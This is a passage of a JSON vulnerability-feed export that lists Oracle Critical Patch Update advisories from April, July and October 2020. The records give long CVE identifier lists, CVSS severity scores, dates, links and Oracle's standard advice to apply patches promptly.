"CVE-2020-14658", "CVE-2020-14659", "CVE-2020-14660", "CVE-2020-14661", "CVE-2020-14662", "CVE-2020-14663", "CVE-2020-14664", "CVE-2020-14665", "CVE-2020-14666", "CVE-2020-14667", "CVE-2020-14668", "CVE-2020-14669", "CVE-2020-14670", "CVE-2020-14671", "CVE-2020-14673", "CVE-2020-14674", "CVE-2020-14675", "CVE-2020-14676", "CVE-2020-14677", "CVE-2020-14678", "CVE-2020-14679", "CVE-2020-14680", "CVE-2020-14681", "CVE-2020-14682", "CVE-2020-14684", "CVE-2020-14685", "CVE-2020-14686", "CVE-2020-14687", "CVE-2020-14688", "CVE-2020-14690", "CVE-2020-14691", "CVE-2020-14692", "CVE-2020-14693", "CVE-2020-14694", "CVE-2020-14695", "CVE-2020-14696", "CVE-2020-14697", "CVE-2020-14698", "CVE-2020-14699", "CVE-2020-14700", "CVE-2020-14701", "CVE-2020-14702", "CVE-2020-14703", "CVE-2020-14704", "CVE-2020-14705", "CVE-2020-14706", "CVE-2020-14707", "CVE-2020-14708", "CVE-2020-14709", "CVE-2020-14710", "CVE-2020-14711", "CVE-2020-14712", "CVE-2020-14713", "CVE-2020-14714", "CVE-2020-14715", "CVE-2020-14716", "CVE-2020-14717", "CVE-2020-14718", "CVE-2020-14719", "CVE-2020-14720", "CVE-2020-14721", "CVE-2020-14722", "CVE-2020-14723", "CVE-2020-14724", "CVE-2020-14725", "CVE-2020-1927", "CVE-2020-1934", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1950", "CVE-2020-1951", "CVE-2020-1967", "CVE-2020-2513", "CVE-2020-2555", "CVE-2020-2562", "CVE-2020-2966", "CVE-2020-2967", "CVE-2020-2968", "CVE-2020-2969", "CVE-2020-2971", "CVE-2020-2972", "CVE-2020-2973", "CVE-2020-2974", "CVE-2020-2975", "CVE-2020-2976", "CVE-2020-2977", "CVE-2020-2978", "CVE-2020-2981", "CVE-2020-2982", "CVE-2020-2983", "CVE-2020-2984", "CVE-2020-5258", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-6851", "CVE-2020-7059", "CVE-2020-7060", "CVE-2020-7595", "CVE-2020-8112", "CVE-2020-8172", "CVE-2020-9327", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548"], "modified": "2020-12-01T00:00:00", "id": "ORACLE:CPUJUL2020", "href": "https://www.oracle.com/security-alerts/cpujul2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T08:08:53", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n \nStarting with the October 2020 Critical Patch Update, Oracle lists updates that address vulnerabilities in third-party components which are not exploitable in the context of their inclusion in their respective Oracle product beneath the product's risk matrix. Oracle has published two versions of the October 2020 Critical Patch Update Advisory: this version of the advisory implemented the change in how non-exploitable vulnerabilities in third-party components are reported, and the \u201ctraditional\u201d advisory follows the same format as the previous advisories. The \u201ctraditional\u201d advisory is published at <https://www.oracle.com/security-alerts/cpuoct2020traditional.html>. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 403 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2712240.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-20T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7285", "CVE-2015-1832", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1000338", "CVE-2016-1000339", "CVE-2016-1000340", "CVE-2016-1000341", "CVE-2016-1000342", "CVE-2016-1000343", "CVE-2016-1000344", "CVE-2016-1000345", "CVE-2016-1000346", "CVE-2016-1000352", "CVE-2016-10244", "CVE-2016-10328", "CVE-2016-2167", "CVE-2016-2168", "CVE-2016-2183", "CVE-2016-2510", "CVE-2016-3189", "CVE-2016-4800", "CVE-2016-5000", "CVE-2016-5300", "CVE-2016-5725", "CVE-2016-6153", "CVE-2016-6306", "CVE-2016-8610", "CVE-2016-8734", "CVE-2017-10989", "CVE-2017-12626", "CVE-2017-13098", "CVE-2017-13685", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-15095", "CVE-2017-15286", "CVE-2017-17485", "CVE-2017-3164", "CVE-2017-5644", "CVE-2017-5645", "CVE-2017-5662", "CVE-2017-7525", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2017-9096", "CVE-2017-9735", "CVE-2017-9800", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000873", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-12536", "CVE-2018-12538", "CVE-2018-12545", "CVE-2018-14718", "CVE-2018-15769", "CVE-2018-17196", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-20346", "CVE-2018-20505", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-2765", "CVE-2018-3693", "CVE-2018-5382", "CVE-2018-5968", "CVE-2018-6942", "CVE-2018-7489", "CVE-2018-8013", "CVE-2018-8088", "CVE-2018-8740", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0192", "CVE-2019-0201", "CVE-2019-10072", "CVE-2019-10097", "CVE-2019-1010239", "CVE-2019-10173", "CVE-2019-10241", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-10744", "CVE-2019-11048", "CVE-2019-11358", "CVE-2019-11477", "CVE-2019-11478", "CVE-2019-11479", "CVE-2019-11834", "CVE-2019-11835", "CVE-2019-11922", "CVE-2019-12086", "CVE-2019-12260", "CVE-2019-12261", "CVE-2019-12384", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12419", "CVE-2019-12423", "CVE-2019-12814", "CVE-2019-12900", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14540", "CVE-2019-14893", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17495", "CVE-2019-17531", "CVE-2019-17543", "CVE-2019-17558", "CVE-2019-17569", "CVE-2019-17632", "CVE-2019-17638", "CVE-2019-18348", "CVE-2019-20330", "CVE-2019-2897", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5018", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9511", "CVE-2019-9513", "CVE-2019-9936", "CVE-2019-9937", "CVE-2020-10108", "CVE-2020-10543", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10722", "CVE-2020-10723", "CVE-2020-10724", "CVE-2020-10878", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-11971", "CVE-2020-11972", "CVE-2020-11973", "CVE-2020-11984", "CVE-2020-11993", "CVE-2020-11996", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-13920", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14195", "CVE-2020-14672", "CVE-2020-14731", "CVE-2020-14732", "CVE-2020-14734", "CVE-2020-14735", "CVE-2020-14736", "CVE-2020-14740", "CVE-2020-14741", "CVE-2020-14742", "CVE-2020-14743", "CVE-2020-14744", "CVE-2020-14745", "CVE-2020-14746", "CVE-2020-14752", "CVE-2020-14753", "CVE-2020-14754", "CVE-2020-14757", "CVE-2020-14758", "CVE-2020-14759", "CVE-2020-14760", "CVE-2020-14761", "CVE-2020-14762", "CVE-2020-14763", "CVE-2020-14764", "CVE-2020-14765", "CVE-2020-14766", "CVE-2020-14767", "CVE-2020-14768", "CVE-2020-14769", "CVE-2020-14770", "CVE-2020-14771", "CVE-2020-14772", "CVE-2020-14773", "CVE-2020-14774", "CVE-2020-14775", "CVE-2020-14776", "CVE-2020-14777", "CVE-2020-14778", "CVE-2020-14779", "CVE-2020-14780", "CVE-2020-14781", "CVE-2020-14782", "CVE-2020-14783", "CVE-2020-14784", "CVE-2020-14785", "CVE-2020-14786", "CVE-2020-14787", "CVE-2020-14788", "CVE-2020-14789", "CVE-2020-14790", "CVE-2020-14791", "CVE-2020-14792", "CVE-2020-14793", "CVE-2020-14794", "CVE-2020-14795", "CVE-2020-14796", "CVE-2020-14797", "CVE-2020-14798", "CVE-2020-14799", "CVE-2020-14800", "CVE-2020-14801", "CVE-2020-14802", "CVE-2020-14803", "CVE-2020-14804", "CVE-2020-14805", "CVE-2020-14806", "CVE-2020-14807", "CVE-2020-14808", "CVE-2020-14809", "CVE-2020-14810", "CVE-2020-14811", "CVE-2020-14812", "CVE-2020-14813", "CVE-2020-14814", "CVE-2020-14815", "CVE-2020-14816", "CVE-2020-14817", "CVE-2020-14818", "CVE-2020-14819", "CVE-2020-14820", "CVE-2020-14821", "CVE-2020-14822", "CVE-2020-14823", "CVE-2020-14824", "CVE-2020-14825", "CVE-2020-14826", "CVE-2020-14827", "CVE-2020-14828", "CVE-2020-14829", "CVE-2020-14830", "CVE-2020-14831", "CVE-2020-14832", "CVE-2020-14833", "CVE-2020-14834", "CVE-2020-14835", "CVE-2020-14836", "CVE-2020-14837", "CVE-2020-14838", "CVE-2020-14839", "CVE-2020-14840", "CVE-2020-14841", "CVE-2020-14842", "CVE-2020-14843", "CVE-2020-14844", "CVE-2020-14845", "CVE-2020-14846", "CVE-2020-14847", "CVE-2020-14848", "CVE-2020-14849", "CVE-2020-14850", "CVE-2020-14851", "CVE-2020-14852", "CVE-2020-14853", "CVE-2020-14854", "CVE-2020-14855", "CVE-2020-14856", "CVE-2020-14857", "CVE-2020-14858", "CVE-2020-14859", "CVE-2020-14860", "CVE-2020-14861", "CVE-2020-14862", "CVE-2020-14863", "CVE-2020-14864", "CVE-2020-14865", "CVE-2020-14866", "CVE-2020-14867", "CVE-2020-14868", "CVE-2020-14869", "CVE-2020-14870", "CVE-2020-14871", "CVE-2020-14872", "CVE-2020-14873", "CVE-2020-14875", "CVE-2020-14876", "CVE-2020-14877", "CVE-2020-14878", "CVE-2020-14879", "CVE-2020-14880", "CVE-2020-14881", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-14884", "CVE-2020-14885", "CVE-2020-14886", "CVE-2020-14887", "CVE-2020-14888", "CVE-2020-14889", "CVE-2020-14890", "CVE-2020-14891", "CVE-2020-14892", "CVE-2020-14893", "CVE-2020-14894", "CVE-2020-14895", "CVE-2020-14896", "CVE-2020-14897", "CVE-2020-14898", "CVE-2020-14899", "CVE-2020-14900", "CVE-2020-14901", "CVE-2020-15358", "CVE-2020-15389", "CVE-2020-1730", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1950", "CVE-2020-1951", "CVE-2020-1953", "CVE-2020-1954", "CVE-2020-1967", "CVE-2020-2555", "CVE-2020-3235", "CVE-2020-3909", "CVE-2020-4051", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-5407", "CVE-2020-5408", "CVE-2020-7067", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8840", "CVE-2020-9281", "CVE-2020-9327", "CVE-2020-9409", "CVE-2020-9410", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9489", "CVE-2020-9490", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548"], "modified": "2020-12-08T00:00:00", "id": "ORACLE:CPUOCT2020", "href": "https://www.oracle.com/security-alerts/cpuoct2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T02:46:16", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 399 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2652714.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0254", "CVE-2015-1832", "CVE-2015-3253", "CVE-2015-7940", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-10244", "CVE-2016-10251", "CVE-2016-10328", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-3092", "CVE-2016-4000", "CVE-2016-4463", "CVE-2016-6306", "CVE-2016-6489", "CVE-2016-7103", "CVE-2016-8610", "CVE-2017-12626", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-14735", "CVE-2017-15706", "CVE-2017-3160", "CVE-2017-5130", "CVE-2017-5529", "CVE-2017-5533", "CVE-2017-5645", "CVE-2017-5754", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2018-0732", "CVE-2018-0734", "CVE-2018-0737", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000632", "CVE-2018-1000873", "CVE-2018-10237", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-1165", "CVE-2018-11775", "CVE-2018-11784", "CVE-2018-11797", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-1258", "CVE-2018-1304", "CVE-2018-1305", "CVE-2018-1320", "CVE-2018-1336", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-17197", "CVE-2018-18227", "CVE-2018-18311", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-19622", "CVE-2018-19623", "CVE-2018-19624", "CVE-2018-19625", "CVE-2018-19626", "CVE-2018-19627", "CVE-2018-19628", "CVE-2018-20346", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-20852", "CVE-2018-5407", "CVE-2018-5711", "CVE-2018-5712", "CVE-2018-6942", "CVE-2018-8014", "CVE-2018-8032", "CVE-2018-8034", "CVE-2018-8036", "CVE-2018-8037", "CVE-2018-8039", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-0199", "CVE-2019-0211", "CVE-2019-0215", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-0221", "CVE-2019-0222", "CVE-2019-0227", "CVE-2019-0228", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-10088", "CVE-2019-10092", "CVE-2019-10093", "CVE-2019-10094", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-1010238", "CVE-2019-10173", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12387", "CVE-2019-12402", "CVE-2019-12406", "CVE-2019-12415", "CVE-2019-12418", "CVE-2019-12419", "CVE-2019-12855", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-14821", "CVE-2019-14889", "CVE-2019-15161", "CVE-2019-15162", "CVE-2019-15163", "CVE-2019-15164", "CVE-2019-15165", "CVE-2019-1543", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-15601", "CVE-2019-15604", "CVE-2019-15605", "CVE-2019-15606", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16056", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17195", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-17563", "CVE-2019-17571", "CVE-2019-18197", "CVE-2019-19242", "CVE-2019-19244", "CVE-2019-19269", "CVE-2019-19317", "CVE-2019-19553", "CVE-2019-19603", "CVE-2019-19645", "CVE-2019-19646", "CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19924", "CVE-2019-19925", "CVE-2019-19926", "CVE-2019-19959", "CVE-2019-20218", "CVE-2019-20330", "CVE-2019-2412", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2756", "CVE-2019-2759", "CVE-2019-2852", "CVE-2019-2853", "CVE-2019-2878", "CVE-2019-2880", "CVE-2019-2899", "CVE-2019-2904", "CVE-2019-3008", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9517", "CVE-2019-9579", "CVE-2020-2514", "CVE-2020-2522", "CVE-2020-2524", "CVE-2020-2553", "CVE-2020-2558", "CVE-2020-2575", "CVE-2020-2578", "CVE-2020-2594", "CVE-2020-2680", "CVE-2020-2706", "CVE-2020-2733", "CVE-2020-2734", "CVE-2020-2735", "CVE-2020-2737", "CVE-2020-2738", "CVE-2020-2739", "CVE-2020-2740", "CVE-2020-2741", "CVE-2020-2742", "CVE-2020-2743", "CVE-2020-2744", "CVE-2020-2745", "CVE-2020-2746", "CVE-2020-2747", "CVE-2020-2748", "CVE-2020-2749", "CVE-2020-2750", "CVE-2020-2751", "CVE-2020-2752", "CVE-2020-2753", "CVE-2020-2754", "CVE-2020-2755", "CVE-2020-2756", "CVE-2020-2757", "CVE-2020-2758", "CVE-2020-2759", "CVE-2020-2760", "CVE-2020-2761", "CVE-2020-2762", "CVE-2020-2763", "CVE-2020-2764", "CVE-2020-2765", "CVE-2020-2766", "CVE-2020-2767", "CVE-2020-2768", "CVE-2020-2769", "CVE-2020-2770", "CVE-2020-2771", "CVE-2020-2772", "CVE-2020-2773", "CVE-2020-2774", "CVE-2020-2775", "CVE-2020-2776", "CVE-2020-2777", "CVE-2020-2778", "CVE-2020-2779", "CVE-2020-2780", "CVE-2020-2781", "CVE-2020-2782", "CVE-2020-2783", "CVE-2020-2784", "CVE-2020-2785", "CVE-2020-2786", "CVE-2020-2787", "CVE-2020-2789", "CVE-2020-2790", "CVE-2020-2791", "CVE-2020-2793", "CVE-2020-2794", "CVE-2020-2795", "CVE-2020-2796", "CVE-2020-2797", "CVE-2020-2798", "CVE-2020-2799", "CVE-2020-2800", "CVE-2020-2801", "CVE-2020-2802", "CVE-2020-2803", "CVE-2020-2804", "CVE-2020-2805", "CVE-2020-2806", "CVE-2020-2807", "CVE-2020-2808", "CVE-2020-2809", "CVE-2020-2810", "CVE-2020-2811", "CVE-2020-2812", "CVE-2020-2813", "CVE-2020-2814", "CVE-2020-2815", "CVE-2020-2816", "CVE-2020-2817", "CVE-2020-2818", "CVE-2020-2819", "CVE-2020-2820", "CVE-2020-2821", "CVE-2020-2822", "CVE-2020-2823", "CVE-2020-2824", "CVE-2020-2825", "CVE-2020-2826", "CVE-2020-2827", "CVE-2020-2828", "CVE-2020-2829", "CVE-2020-2830", "CVE-2020-2831", "CVE-2020-2832", "CVE-2020-2833", "CVE-2020-2834", "CVE-2020-2835", "CVE-2020-2836", "CVE-2020-2837", "CVE-2020-2838", "CVE-2020-2839", "CVE-2020-2840", "CVE-2020-2841", "CVE-2020-2842", "CVE-2020-2843", "CVE-2020-2844", "CVE-2020-2845", "CVE-2020-2846", "CVE-2020-2847", "CVE-2020-2848", "CVE-2020-2849", "CVE-2020-2850", "CVE-2020-2851", "CVE-2020-2852", "CVE-2020-2853", "CVE-2020-2854", "CVE-2020-2855", "CVE-2020-2856", "CVE-2020-2857", "CVE-2020-2858", "CVE-2020-2859", "CVE-2020-2860", "CVE-2020-2861", "CVE-2020-2862", "CVE-2020-2863", "CVE-2020-2864", "CVE-2020-2865", "CVE-2020-2866", "CVE-2020-2867", "CVE-2020-2868", "CVE-2020-2869", "CVE-2020-2870", "CVE-2020-2871", "CVE-2020-2872", "CVE-2020-2873", "CVE-2020-2874", "CVE-2020-2875", "CVE-2020-2876", "CVE-2020-2877", "CVE-2020-2878", "CVE-2020-2879", "CVE-2020-2880", "CVE-2020-2881", "CVE-2020-2882", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2885", "CVE-2020-2886", "CVE-2020-2887", "CVE-2020-2888", "CVE-2020-2889", "CVE-2020-2890", "CVE-2020-2891", "CVE-2020-2892", "CVE-2020-2893", "CVE-2020-2894", "CVE-2020-2895", "CVE-2020-2896", "CVE-2020-2897", "CVE-2020-2898", "CVE-2020-2899", "CVE-2020-2900", "CVE-2020-2901", "CVE-2020-2902", "CVE-2020-2903", "CVE-2020-2904", "CVE-2020-2905", "CVE-2020-2906", "CVE-2020-2907", "CVE-2020-2908", "CVE-2020-2909", "CVE-2020-2910", "CVE-2020-2911", "CVE-2020-2912", "CVE-2020-2913", "CVE-2020-2914", "CVE-2020-2915", "CVE-2020-2920", "CVE-2020-2921", "CVE-2020-2922", "CVE-2020-2923", "CVE-2020-2924", "CVE-2020-2925", "CVE-2020-2926", "CVE-2020-2927", "CVE-2020-2928", "CVE-2020-2929", "CVE-2020-2930", "CVE-2020-2931", "CVE-2020-2932", "CVE-2020-2933", "CVE-2020-2934", "CVE-2020-2935", "CVE-2020-2936", "CVE-2020-2937", "CVE-2020-2938", "CVE-2020-2939", "CVE-2020-2940", "CVE-2020-2941", "CVE-2020-2942", "CVE-2020-2943", "CVE-2020-2944", "CVE-2020-2945", "CVE-2020-2946", "CVE-2020-2947", "CVE-2020-2949", "CVE-2020-2950", "CVE-2020-2951", "CVE-2020-2952", "CVE-2020-2953", "CVE-2020-2954", "CVE-2020-2955", "CVE-2020-2956", "CVE-2020-2958", "CVE-2020-2959", "CVE-2020-2961", "CVE-2020-2963", "CVE-2020-2964", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-7044", "CVE-2020-8840"], "modified": "2020-07-20T00:00:00", "id": "ORACLE:CPUAPR2020", "href": "https://www.oracle.com/security-alerts/cpuapr2020.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}